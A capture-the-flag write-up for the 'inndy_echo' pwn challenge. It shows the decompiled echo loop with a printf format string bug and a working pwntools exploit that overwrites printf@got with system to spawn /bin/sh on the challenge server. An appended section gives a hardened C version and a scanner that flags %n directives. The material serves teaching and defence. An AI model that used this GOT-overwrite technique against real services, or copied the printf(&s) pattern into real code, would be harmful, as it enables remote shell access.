
inndy_echo

inndy_echo
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

32-bit, with only NX enabled.

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s; // [esp+Ch] [ebp-10Ch]
  unsigned int v4; // [esp+10Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  do
  {
    fgets(&s, 0x100, stdin);
    printf(&s); // user input is passed directly as the format string
  }
  while ( strcmp(&s, "exit\n") );
  system("echo Goodbye");
  exit(0);
}

The program is simple: printf(&s) gives us a format string vulnerability, and system is already available in the binary.

Approach

Overwrite printf@got with system, then send /bin/sh.

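from pwn import *
from Yapack import *  # provides the rec/sl/ia helpers used below

r, elf = rec("node4.buuoj ", 25120, "./pwn", 10)
context(os='linux', arch='i386', log_level='debug')
# debug('b *0x80485b9')

# Format string offset 7: overwrite printf@got with the address of system
pl = fmtstr_payload(7, {elf.got['printf']: elf.sym['system']})
sl(pl)
# The next printf(&s) in the loop now calls system(&s)
sl(b'/bin/sh\x00')
ia(c)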
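The fix for the printf(&s) call in main() above, as an added example that is not part of the original write-up: the input is printed with fputs so it is never parsed as a format string, and count_directives (a hypothetical helper) flags conversion directives in untrusted input so they can be logged. Building with -Wformat -Wformat-security reports the original call at compile time, and full RELRO (-Wl,-z,relro,-z,now) makes the GOT read-only.

```c
/* Added example: hardened echo loop plus a directive scanner for logging. */
#include <stdio.h>
#include <string.h>

/* Count printf conversion directives in untrusted input. Sets *has_n when a
 * %n-family directive (the one that writes to memory) is present.
 * count_directives is a hypothetical helper, not part of the challenge. */
static int count_directives(const char *s, int *has_n)
{
    int count = 0;

    *has_n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        s++;
        if (*s == '%')              /* "%%" is a literal percent sign */
            continue;
        /* skip positional index, flags, width, precision, length modifiers */
        s += strspn(s, "0123456789$#-+ '*.hlLqjzt");
        if (*s == '\0')             /* truncated directive at end of input */
            break;
        if (*s == 'n')
            *has_n = 1;
        count++;
    }
    return count;
}

int main(void)
{
    char s[0x100];
    int has_n;

    setvbuf(stdout, NULL, _IONBF, 0);
    while (fgets(s, sizeof s, stdin) && strcmp(s, "exit\n") != 0) {
        int n = count_directives(s, &has_n);
        if (n > 0)
            fprintf(stderr, "input has %d format directive(s)%s\n",
                    n, has_n ? ", including a write directive" : "");
        fputs(s, stdout);           /* input is data, never the format */
    }
    return 0;
}
```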
